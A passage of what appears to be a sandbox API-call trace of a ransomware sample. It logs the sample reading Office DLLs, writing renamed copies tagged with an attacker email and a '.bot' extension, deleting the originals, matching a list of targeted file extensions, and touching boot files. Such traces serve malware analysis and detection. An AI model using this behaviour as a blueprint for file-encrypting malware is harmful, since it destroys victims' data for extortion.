	[0058.299] ReadFile (in: hFile=0x234, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.300] WriteFile (in: hFile=0x188, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0058.300] SetEndOfFile (hFile=0x188) returned 1
	[0058.300] CloseHandle (hObject=0x188) returned 1
	[0058.300] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.300] SetEndOfFile (hFile=0x234) returned 1
	[0058.539] CloseHandle (hObject=0x234) returned 1
	[0058.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.539] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll")) returned 1
	[0058.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.549] lstrlenW (lpString=".doc") returned 4
	[0058.549] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.549] lstrlenW (lpString=".docx") returned 5
	[0058.549] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1
	[0058.549] lstrlenW (lpString=".pdf") returned 4
	[0058.549] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.549] lstrlenW (lpString=".xls") returned 4
	[0058.549] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.549] lstrlenW (lpString=".xlsx") returned 5
	[0058.549] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1
	[0058.549] lstrlenW (lpString=".ppt") returned 4
	[0058.549] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.549] lstrlenW (lpString=".zip") returned 4
	[0058.549] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.550] lstrlenW (lpString=".rar") returned 4
	[0058.550] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.550] lstrlenW (lpString=".bz2") returned 4
	[0058.550] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.550] lstrlenW (lpString=".7z") returned 3
	[0058.550] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.550] lstrlenW (lpString=".dbf") returned 4
	[0058.550] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.550] lstrlenW (lpString=".1cd") returned 4
	[0058.550] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.550] lstrlenW (lpString=".jpg") returned 4
	[0058.550] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.550] lstrlenW (lpString=".doc") returned 4
	[0058.550] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.550] lstrlenW (lpString=".docx") returned 5
	[0058.550] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1
	[0058.550] lstrlenW (lpString=".pdf") returned 4
	[0058.550] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.550] lstrlenW (lpString=".xls") returned 4
	[0058.550] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.550] lstrlenW (lpString=".xlsx") returned 5
	[0058.550] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1
	[0058.550] lstrlenW (lpString=".ppt") returned 4
	[0058.550] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.550] lstrlenW (lpString=".zip") returned 4
	[0058.550] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.550] lstrlenW (lpString=".rar") returned 4
	[0058.550] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.550] lstrlenW (lpString=".bz2") returned 4
	[0058.551] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.551] lstrlenW (lpString=".7z") returned 3
	[0058.551] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.551] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.551] lstrlenW (lpString=".dbf") returned 4
	[0058.551] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.551] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.551] lstrlenW (lpString=".1cd") returned 4
	[0058.551] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.551] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66
	[0058.551] lstrlenW (lpString=".jpg") returned 4
	[0058.551] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.551] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.551] lstrlenW (lpString="ACEODTXT.DLL") returned 12
	[0058.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0058.551] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=15800) returned 1
	[0058.551] CloseHandle (hObject=0x20c) returned 1
	[0058.552] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll")) returned 0x20
	[0058.552] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.552] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0058.552] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.552] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.552] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.552] GetLastError () returned 0x0
	[0058.552] ReadFile (in: hFile=0x20c, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x3db8, lpOverlapped=0x0) returned 1
	[0058.554] WriteFile (in: hFile=0x230, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x3dc0, lpOverlapped=0x0) returned 1
	[0058.555] ReadFile (in: hFile=0x20c, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.555] WriteFile (in: hFile=0x230, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.555] SetEndOfFile (hFile=0x230) returned 1
	[0058.555] CloseHandle (hObject=0x230) returned 1
	[0058.555] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.555] SetEndOfFile (hFile=0x20c) returned 1
	[0058.556] CloseHandle (hObject=0x20c) returned 1
	[0058.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.556] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll")) returned 1
	[0058.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.557] lstrlenW (lpString=".doc") returned 4
	[0058.557] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.557] lstrlenW (lpString=".docx") returned 5
	[0058.557] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0058.557] lstrlenW (lpString=".pdf") returned 4
	[0058.557] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.557] lstrlenW (lpString=".xls") returned 4
	[0058.557] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.557] lstrlenW (lpString=".xlsx") returned 5
	[0058.557] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0058.557] lstrlenW (lpString=".ppt") returned 4
	[0058.557] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.557] lstrlenW (lpString=".zip") returned 4
	[0058.557] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.557] lstrlenW (lpString=".rar") returned 4
	[0058.557] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.557] lstrlenW (lpString=".bz2") returned 4
	[0058.557] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.557] lstrlenW (lpString=".7z") returned 3
	[0058.557] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.557] lstrlenW (lpString=".dbf") returned 4
	[0058.557] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.557] lstrlenW (lpString=".1cd") returned 4
	[0058.557] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.557] lstrlenW (lpString=".jpg") returned 4
	[0058.558] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.558] lstrlenW (lpString=".doc") returned 4
	[0058.558] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.558] lstrlenW (lpString=".docx") returned 5
	[0058.558] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0058.558] lstrlenW (lpString=".pdf") returned 4
	[0058.558] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.558] lstrlenW (lpString=".xls") returned 4
	[0058.558] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.558] lstrlenW (lpString=".xlsx") returned 5
	[0058.558] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0058.558] lstrlenW (lpString=".ppt") returned 4
	[0058.558] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.558] lstrlenW (lpString=".zip") returned 4
	[0058.558] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.558] lstrlenW (lpString=".rar") returned 4
	[0058.558] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.558] lstrlenW (lpString=".bz2") returned 4
	[0058.558] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.558] lstrlenW (lpString=".7z") returned 3
	[0058.558] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.558] lstrlenW (lpString=".dbf") returned 4
	[0058.558] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.558] lstrlenW (lpString=".1cd") returned 4
	[0058.558] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68
	[0058.558] lstrlenW (lpString=".jpg") returned 4
	[0058.558] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.559] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.559] lstrlenW (lpString="ACEOLEDB.DLL") returned 12
	[0058.559] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.560] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=537504) returned 1
	[0058.560] CloseHandle (hObject=0x188) returned 1
	[0058.560] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll")) returned 0x20
	[0058.560] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.560] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.560] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0058.560] GetLastError () returned 0x0
	[0058.560] ReadFile (in: hFile=0x188, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x833a0, lpOverlapped=0x0) returned 1
	[0058.571] WriteFile (in: hFile=0x20c, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x833b0, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x833b0, lpOverlapped=0x0) returned 1
	[0058.581] ReadFile (in: hFile=0x188, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.581] WriteFile (in: hFile=0x20c, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.581] SetEndOfFile (hFile=0x20c) returned 1
	[0058.581] CloseHandle (hObject=0x20c) returned 1
	[0058.581] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.581] SetEndOfFile (hFile=0x188) returned 1
	[0058.846] CloseHandle (hObject=0x188) returned 1
	[0058.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.846] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll")) returned 1
	[0059.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.074] lstrlenW (lpString=".doc") returned 4
	[0059.075] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0059.075] lstrlenW (lpString=".docx") returned 5
	[0059.075] lstrcmpiW (lpString1=".docx", lpString2="B.DLL") returned -1
	[0059.075] lstrlenW (lpString=".pdf") returned 4
	[0059.075] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0059.075] lstrlenW (lpString=".xls") returned 4
	[0059.075] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0059.075] lstrlenW (lpString=".xlsx") returned 5
	[0059.075] lstrcmpiW (lpString1=".xlsx", lpString2="B.DLL") returned -1
	[0059.075] lstrlenW (lpString=".ppt") returned 4
	[0059.075] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0059.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.075] lstrlenW (lpString=".zip") returned 4
	[0059.075] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0059.075] lstrlenW (lpString=".rar") returned 4
	[0059.075] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0059.075] lstrlenW (lpString=".bz2") returned 4
	[0059.075] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0059.075] lstrlenW (lpString=".7z") returned 3
	[0059.075] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0059.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.075] lstrlenW (lpString=".dbf") returned 4
	[0059.075] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0059.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.075] lstrlenW (lpString=".1cd") returned 4
	[0059.075] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0059.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.075] lstrlenW (lpString=".jpg") returned 4
	[0059.075] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0059.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.075] lstrlenW (lpString=".doc") returned 4
	[0059.075] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0059.075] lstrlenW (lpString=".docx") returned 5
	[0059.076] lstrcmpiW (lpString1=".docx", lpString2="B.DLL") returned -1
	[0059.076] lstrlenW (lpString=".pdf") returned 4
	[0059.076] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0059.076] lstrlenW (lpString=".xls") returned 4
	[0059.076] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0059.076] lstrlenW (lpString=".xlsx") returned 5
	[0059.076] lstrcmpiW (lpString1=".xlsx", lpString2="B.DLL") returned -1
	[0059.076] lstrlenW (lpString=".ppt") returned 4
	[0059.076] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0059.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.076] lstrlenW (lpString=".zip") returned 4
	[0059.076] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0059.076] lstrlenW (lpString=".rar") returned 4
	[0059.076] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0059.076] lstrlenW (lpString=".bz2") returned 4
	[0059.076] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0059.076] lstrlenW (lpString=".7z") returned 3
	[0059.076] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0059.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.076] lstrlenW (lpString=".dbf") returned 4
	[0059.076] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0059.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.076] lstrlenW (lpString=".1cd") returned 4
	[0059.076] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0059.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68
	[0059.076] lstrlenW (lpString=".jpg") returned 4
	[0059.076] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0059.076] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0059.076] lstrlenW (lpString="ACEXBE.DLL") returned 10
	[0059.077] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 

Thread:
	id = 14
	os_tid = 0x98c

	[0032.817] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xabd0898
	[0032.818] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xabe08a0
	[0032.818] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f28
	[0032.818] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0xabb02b0
	[0032.818] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f40
	[0032.818] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0xafa0020
	[0032.818] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f58
	[0032.819] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08f58, Size=0x20) returned 0x7df2f68
	[0032.819] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f58
	[0032.819] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08f58, Size=0x20) returned 0x7df2f90
	[0032.819] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.819] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.819] Wow64DisableWow64FsRedirection (in: OldValue=0xa41ff58 | out: OldValue=0xa41ff58*=0x0) returned 1
	[0032.819] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.819] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f68 | out: hHeap=0x7d60000) returned 1
	[0032.819] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.819] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f90 | out: hHeap=0x7d60000) returned 1
	[0032.819] Sleep (dwMilliseconds=0x64) 
	[0033.038] lstrcmpiW (lpString1=".DAT", lpString2=".bot") returned 1
	[0033.038] lstrlenW (lpString="BOOTSTAT.DAT") returned 12
	[0033.038] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0033.249] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=65536) returned 1
	[0033.249] CloseHandle (hObject=0x188) returned 1
	[0033.249] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26
